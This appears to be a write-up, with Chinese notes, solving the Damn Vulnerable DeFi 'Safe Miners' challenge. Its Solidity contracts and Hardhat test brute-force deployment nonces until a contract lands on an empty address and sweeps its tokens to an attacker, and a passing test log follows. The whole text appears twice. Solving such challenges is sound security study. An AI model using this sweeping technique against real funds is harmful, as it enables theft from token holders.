web3maxi
web3maxi
Somebody has sent +2 million DVT tokens to 0x79658d35aB5c38B6b988C23D02e0410A380B8D5c. But the address is empty, isn't it?
To pass this challenge, you have to take all tokens out.
You may need to use prior knowledge, safely.
目标: 偷走所有DVT token
// Mocha hook that runs once the exploit test has finished and checks the
// challenge's success conditions against the token contract.
after(async function () {
    /** SUCCESS CONDITIONS */

    // Nothing may be left at the deposit address ...
    const remainingAtDeposit = await this.token.balanceOf(DEPOSIT_ADDRESS);
    expect(remainingAtDeposit).to.eq("0");

    // ... and the attacker account must hold the full deposited amount.
    const attackerHoldings = await this.token.balanceOf(attacker.address);
    expect(attackerHoldings).to.eq(DEPOSIT_TOKEN_AMOUNT);
});
循环暴力破解找到正确的nonce:合约地址由部署者地址和其nonce确定性地推导出来,因此遍历nonce即可让某个新部署的合约恰好落在存款地址上。
// SPDX-License-Identifier: MIT
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
pragma solidity ^0.8.0;
/// @notice Batch deployer used by the challenge solution: its constructor
///         creates `nonces` TokenSweeper contracts within one transaction.
/// @dev `new` without a salt uses CREATE, so each child's address is derived
///      from this contract's address and its creation nonce; every iteration
///      therefore probes one more candidate address.
///      Defensive takeaway: tokens sent to an address that holds no code are
///      only as safe as the guarantee that nobody else can deploy code there,
///      so confirm the deployment on the target chain before funding it.
contract SafeMinersAttack {
    /// @param attacker Account that receives any tokens a sweeper finds.
    /// @param token    ERC20 token whose balance each sweeper checks.
    /// @param nonces   Number of TokenSweeper contracts to create.
    constructor(
        address attacker,
        IERC20 token,
        uint256 nonces
    ) {
        uint256 remaining = nonces;
        while (remaining != 0) {
            // The instance is not stored; all of its work happens in its constructor.
            new TokenSweeper(attacker, token);
            remaining--;
        }
    }
}
/// @notice Constructor-only contract: if the address it is deployed at holds
///         a balance of `token`, that whole balance is sent to `attacker`.
/// @dev It declares no functions or state, so nothing can be called on it
///      after deployment.
contract TokenSweeper {
    /// @param attacker Recipient of any tokens held at this contract's address.
    /// @param token    ERC20 token to check and transfer.
    constructor(address attacker, IERC20 token) {
        // Inside the constructor address(this) is already the new contract's address.
        uint256 held = token.balanceOf(address(this));
        if (held != 0) {
            // NOTE(review): the boolean returned by transfer() is ignored, so a
            // token that reports failure by returning false would fail silently.
            token.transfer(attacker, held);
        }
    }
}
// Challenge solution: deploys SafeMinersAttack repeatedly from two accounts.
// Each deployment advances the sending account's nonce by one and creates 80
// TokenSweeper contracts, so the run covers 80 x 2 x 80 candidate addresses.
it("Exploit", async function () {
    /** CODE YOUR EXPLOIT HERE */
    // Disable the Mocha timeout; the run recorded on this page took about 140 s.
    this.timeout(0);

    const ROUNDS = 80;
    const SWEEPERS_PER_DEPLOY = 80;

    let round = 0;
    while (round < ROUNDS) {
        // Which account and nonce lead to the deposit address is presumably not
        // known in advance, so both signers are tried in every round.
        for (const signer of [deployer, attacker]) {
            const factory = await ethers.getContractFactory("SafeMinersAttack", signer);
            await factory.deploy(attacker.address, this.token.address, SWEEPERS_PER_DEPLOY);
        }
        round++;
    }
});
运行通过
yarn run safe-miners
yarn run v1.22.19
warning ../../package.json: No license field
$ yarn hardhat test test/safe-miners/safe-miners.challenge.js
warning ../../package.json: No license field
$ /home/runstar/solidityLearn/damn-vulnerable-defi/node_modules/.bin/hardhat test test/safe-miners/safe-miners.challenge.js
[Challenge] Safe Miners
✓ Exploit (140271ms)
1 passing (2m)
Done in 143.80s.
Somebody has sent +2 million DVT tokens to 0x79658d35aB5c38B6b988C23D02e0410A380B8D5c. But the address is empty, isn't it?
To pass this challenge, you have to take all tokens out.
You may need to use prior knowledge, safely.
目标: 偷走所有DVT token
// Mocha hook that runs once the exploit test has finished and checks the
// challenge's success conditions against the token contract.
after(async function () {
    /** SUCCESS CONDITIONS */

    // Nothing may be left at the deposit address ...
    const remainingAtDeposit = await this.token.balanceOf(DEPOSIT_ADDRESS);
    expect(remainingAtDeposit).to.eq("0");

    // ... and the attacker account must hold the full deposited amount.
    const attackerHoldings = await this.token.balanceOf(attacker.address);
    expect(attackerHoldings).to.eq(DEPOSIT_TOKEN_AMOUNT);
});
循环暴力破解找到正确的nonce:合约地址由部署者地址和其nonce确定性地推导出来,因此遍历nonce即可让某个新部署的合约恰好落在存款地址上。
// SPDX-License-Identifier: MIT
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
pragma solidity ^0.8.0;
/// @notice Batch deployer used by the challenge solution: its constructor
///         creates `nonces` TokenSweeper contracts within one transaction.
/// @dev `new` without a salt uses CREATE, so each child's address is derived
///      from this contract's address and its creation nonce; every iteration
///      therefore probes one more candidate address.
///      Defensive takeaway: tokens sent to an address that holds no code are
///      only as safe as the guarantee that nobody else can deploy code there,
///      so confirm the deployment on the target chain before funding it.
contract SafeMinersAttack {
    /// @param attacker Account that receives any tokens a sweeper finds.
    /// @param token    ERC20 token whose balance each sweeper checks.
    /// @param nonces   Number of TokenSweeper contracts to create.
    constructor(
        address attacker,
        IERC20 token,
        uint256 nonces
    ) {
        uint256 remaining = nonces;
        while (remaining != 0) {
            // The instance is not stored; all of its work happens in its constructor.
            new TokenSweeper(attacker, token);
            remaining--;
        }
    }
}
/// @notice Constructor-only contract: if the address it is deployed at holds
///         a balance of `token`, that whole balance is sent to `attacker`.
/// @dev It declares no functions or state, so nothing can be called on it
///      after deployment.
contract TokenSweeper {
    /// @param attacker Recipient of any tokens held at this contract's address.
    /// @param token    ERC20 token to check and transfer.
    constructor(address attacker, IERC20 token) {
        // Inside the constructor address(this) is already the new contract's address.
        uint256 held = token.balanceOf(address(this));
        if (held != 0) {
            // NOTE(review): the boolean returned by transfer() is ignored, so a
            // token that reports failure by returning false would fail silently.
            token.transfer(attacker, held);
        }
    }
}
// Challenge solution: deploys SafeMinersAttack repeatedly from two accounts.
// Each deployment advances the sending account's nonce by one and creates 80
// TokenSweeper contracts, so the run covers 80 x 2 x 80 candidate addresses.
it("Exploit", async function () {
    /** CODE YOUR EXPLOIT HERE */
    // Disable the Mocha timeout; the run recorded on this page took about 140 s.
    this.timeout(0);

    const ROUNDS = 80;
    const SWEEPERS_PER_DEPLOY = 80;

    let round = 0;
    while (round < ROUNDS) {
        // Which account and nonce lead to the deposit address is presumably not
        // known in advance, so both signers are tried in every round.
        for (const signer of [deployer, attacker]) {
            const factory = await ethers.getContractFactory("SafeMinersAttack", signer);
            await factory.deploy(attacker.address, this.token.address, SWEEPERS_PER_DEPLOY);
        }
        round++;
    }
});
运行通过
yarn run safe-miners
yarn run v1.22.19
warning ../../package.json: No license field
$ yarn hardhat test test/safe-miners/safe-miners.challenge.js
warning ../../package.json: No license field
$ /home/runstar/solidityLearn/damn-vulnerable-defi/node_modules/.bin/hardhat test test/safe-miners/safe-miners.challenge.js
[Challenge] Safe Miners
✓ Exploit (140271ms)
1 passing (2m)
Done in 143.80s.